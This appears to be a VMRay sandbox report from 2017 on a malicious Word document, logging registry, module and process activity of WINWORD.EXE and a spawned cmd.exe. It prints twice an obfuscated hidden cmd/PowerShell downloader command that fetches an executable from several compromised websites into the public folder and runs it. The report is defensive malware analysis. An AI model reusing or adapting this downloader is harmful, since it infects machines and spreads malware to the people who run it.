Malicious Microsoft Word Document (Analysis Date 2017-11-28) | Grouped Behavior
Try VMRay Analyzer
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:08, Reason: Analysis Target |
| Unmonitor | End Time: 00:02:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:15 |
| Information | Value |
|---|---|
| PID | 0x9d4 |
| Parent PID | 0x584 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A58
0x
A54
0x
A50
0x
A48
0x
A38
0x
A34
0x
A10
0x
9EC
0x
9E8
0x
9E0
0x
9DC
0x
9D8
0x
A74
0x
A78
0x
A7C
0x
A80
0x
A84
0x
A88
0x
AAC
0x
ACC
0x
AD8
0x
8A0
0x
8B0
0x
8F4
0x
910
|
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\Licenses | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 | - |
|
2 | |
| Open Key | win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 | data = } |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = RequireDeclaration, data = 78, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnAllErrors, data = 255, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
2 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) | os_pid = 0xad0, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x7fee3590000 |
|
1 | |
| Get Handle | Unknown module name | base_address = 0x7fef8cd0000 |
|
1 | |
| Get Handle | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\system32\user32.dll | base_address = 0x76e70000 |
|
1 | |
| Get Handle | oleaut32.dll | base_address = 0x7feff1c0000 |
|
1 | |
| Get Handle | ole32.dll | base_address = 0x7fefe810000 |
|
1 | |
| Get Filename | - | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
2 | |
| Get Address | Unknown module name | function = MsiProvideQualifiedComponentA, address_out = 0x7fef8d53b3c |
|
1 | |
| Get Address | Unknown module name | function = MsiGetProductCodeA, address_out = 0x7fef8d4a13c |
|
1 | |
| Get Address | Unknown module name | function = MsiReinstallFeatureA, address_out = 0x7fef8d51618 |
|
1 | |
| Get Address | Unknown module name | function = MsiProvideComponentA, address_out = 0x7fef8d4f088 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetSystemMetrics, address_out = 0x76e894f0 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromWindow, address_out = 0x76e85f08 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromRect, address_out = 0x76e82b00 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromPoint, address_out = 0x76e7ab64 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayMonitors, address_out = 0x76e85c30 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetMonitorInfoA, address_out = 0x76e7a730 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayDevicesA, address_out = 0x76e7a5b4 |
|
1 | |
| Get Address | Unknown module name | function = DispCallFunc, address_out = 0x7feff1c2270 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLibEx, address_out = 0x7feff1ca550 |
|
1 | |
| Get Address | Unknown module name | function = UnRegisterTypeLib, address_out = 0x7feff2520d0 |
|
1 | |
| Get Address | Unknown module name | function = CreateTypeLib2, address_out = 0x7feff24dbd0 |
|
1 | |
| Get Address | Unknown module name | function = VarDateFromUdate, address_out = 0x7feff1c5c90 |
|
1 | |
| Get Address | Unknown module name | function = VarUdateFromDate, address_out = 0x7feff1c6330 |
|
1 | |
| Get Address | Unknown module name | function = GetAltMonthNames, address_out = 0x7feff1e66c0 |
|
1 | |
| Get Address | Unknown module name | function = VarNumFromParseNum, address_out = 0x7feff1c4710 |
|
1 | |
| Get Address | Unknown module name | function = VarParseNumFromStr, address_out = 0x7feff1c48f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR4, address_out = 0x7feff1fb640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR8, address_out = 0x7feff1fb360 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromDate, address_out = 0x7feff202640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromI4, address_out = 0x7feff1e58a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromCy, address_out = 0x7feff1e5820 |
|
1 | |
| Get Address | Unknown module name | function = VarR4FromDec, address_out = 0x7feff1faf20 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromTypeInfo, address_out = 0x7feff21a0c0 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromGuids, address_out = 0x7feff252160 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetRecordInfo, address_out = 0x7feff1e5af0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetRecordInfo, address_out = 0x7feff1e5a90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetIID, address_out = 0x7feff1e5a60 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetIID, address_out = 0x7feff1e5a30 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCopyData, address_out = 0x7feff1c60b0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayAllocDescriptorEx, address_out = 0x7feff1c3e90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCreateEx, address_out = 0x7feff219f80 |
|
1 | |
| Get Address | Unknown module name | function = VarFormat, address_out = 0x7feff249b20 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatDateTime, address_out = 0x7feff249aa0 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatNumber, address_out = 0x7feff249990 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatPercent, address_out = 0x7feff249890 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatCurrency, address_out = 0x7feff249770 |
|
1 | |
| Get Address | Unknown module name | function = VarWeekdayName, address_out = 0x7feff22b8d0 |
|
1 | |
| Get Address | Unknown module name | function = VarMonthName, address_out = 0x7feff22b800 |
|
1 | |
| Get Address | Unknown module name | function = VarAdd, address_out = 0x7feff2448e0 |
|
1 | |
| Get Address | Unknown module name | function = VarAnd, address_out = 0x7feff249470 |
|
1 | |
| Get Address | Unknown module name | function = VarCat, address_out = 0x7feff2496a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDiv, address_out = 0x7feff242fe0 |
|
1 | |
| Get Address | Unknown module name | function = VarEqv, address_out = 0x7feff249cf0 |
|
1 | |
| Get Address | Unknown module name | function = VarIdiv, address_out = 0x7feff248ff0 |
|
1 | |
| Get Address | Unknown module name | function = VarImp, address_out = 0x7feff249c00 |
|
1 | |
| Get Address | Unknown module name | function = VarMod, address_out = 0x7feff248e60 |
|
1 | |
| Get Address | Unknown module name | function = VarMul, address_out = 0x7feff243690 |
|
1 | |
| Get Address | Unknown module name | function = VarOr, address_out = 0x7feff2492d0 |
|
1 | |
| Get Address | Unknown module name | function = VarPow, address_out = 0x7feff242e80 |
|
1 | |
| Get Address | Unknown module name | function = VarSub, address_out = 0x7feff243f90 |
|
1 | |
| Get Address | Unknown module name | function = VarXor, address_out = 0x7feff2491a0 |
|
1 | |
| Get Address | Unknown module name | function = VarAbs, address_out = 0x7feff227c30 |
|
1 | |
| Get Address | Unknown module name | function = VarFix, address_out = 0x7feff227a60 |
|
1 | |
| Get Address | Unknown module name | function = VarInt, address_out = 0x7feff227890 |
|
1 | |
| Get Address | Unknown module name | function = VarNeg, address_out = 0x7feff227ea0 |
|
1 | |
| Get Address | Unknown module name | function = VarNot, address_out = 0x7feff249600 |
|
1 | |
| Get Address | Unknown module name | function = VarRound, address_out = 0x7feff2276a0 |
|
1 | |
| Get Address | Unknown module name | function = VarCmp, address_out = 0x7feff2483f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecAdd, address_out = 0x7feff1f3070 |
|
1 | |
| Get Address | Unknown module name | function = VarDecCmp, address_out = 0x7feff1fd700 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCat, address_out = 0x7feff1fd890 |
|
1 | |
| Get Address | Unknown module name | function = VarCyMulI4, address_out = 0x7feff1dcaf0 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCmp, address_out = 0x7feff1e8a00 |
|
1 | |
| Get Address | Unknown module name | function = CoCreateInstanceEx, address_out = 0x7fefe81de90 |
|
1 | |
| Get Address | Unknown module name | function = CLSIDFromProgIDEx, address_out = 0x7fefe82a4c4 |
|
1 | |
| Get Address | Unknown module name | function = MsoMultiByteToWideChar, address_out = 0x7fee359f200 |
|
1 | |
| Get Address | Unknown module name | function = 713, address_out = 0x7fef103a1f4 |
|
1 | |
| Get Address | Unknown module name | function = 601, address_out = 0x7fef103c3e0 |
|
1 | |
| Get Address | Unknown module name | function = 600, address_out = 0x7fef0dbc6fc |
|
1 | |
| Get Address | Unknown module name | function = 632, address_out = 0x7fef0dffe60 |
|
1 | |
| Get Address | Unknown module name | function = 608, address_out = 0x7fef0e0142c |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 959, y_out = 696 |
|
3 | |
| Get Time | type = Local Time, time = 2017-11-28 18:18:02 (Local Time) |
|
16 | |
| Get Time | type = Local Time, time = 2017-11-28 18:18:03 (Local Time) |
|
2 | |
| Get Time | type = Local Time, time = 2017-11-28 18:19:09 (Local Time) |
|
6 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Operating System |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = DDRYBUR |
|
1 |
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:19, Reason: Child Process |
| Unmonitor | End Time: 00:02:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:04 |
| Information | Value |
|---|---|
| PID | 0xad0 |
| Parent PID | 0x9d4 (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AD4
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0xaec, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49f60000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76f70000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\CmD.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76f86d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76f823d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76f78290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76f817e0 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2017-11-28 18:18:04 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 85301 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
11 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = binkOHOTJcSMBkQ |
|
1 | |
| Get Environment String | name = =EINhmPkdO&&set |
|
1 | |
| Get Environment String | name = kiqjRiiiH |
|
2 | |
| Get Environment String | name = =owe^r^s&&set |
|
1 | |
| Get Environment String | name = zzwpVwCTCRDvTBu |
|
1 | |
| Get Environment String | name = =pOwoJiQoW&&set |
|
1 | |
| Get Environment String | name = CdjPuLtXi |
|
2 | |
| Get Environment String | name = =p&&set |
|
1 | |
| Get Environment String | name = GKZajcAqFZkRLZw |
|
1 | |
| Get Environment String | name = =NazJjhVlGSrXQvT&&set |
|
1 | |
| Get Environment String | name = QiiPPcnDM |
|
2 | |
